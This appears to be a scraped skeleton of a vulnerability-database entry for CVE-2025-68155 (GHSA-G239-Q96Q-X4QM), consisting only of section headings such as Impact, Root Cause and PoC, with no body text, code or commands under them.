Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-68155 (GCVE-0-2025-68155)

GHSA-G239-Q96Q-X4QM

Summary

Impact

Who Is Affected?

Attack Scenarios

What Can Be Leaked?

Details

Vulnerable Code Location

Root Cause

PoC

Quick Test (Single Command)

FKIE_CVE-2025-68155

Tags

Sightings

Nomenclature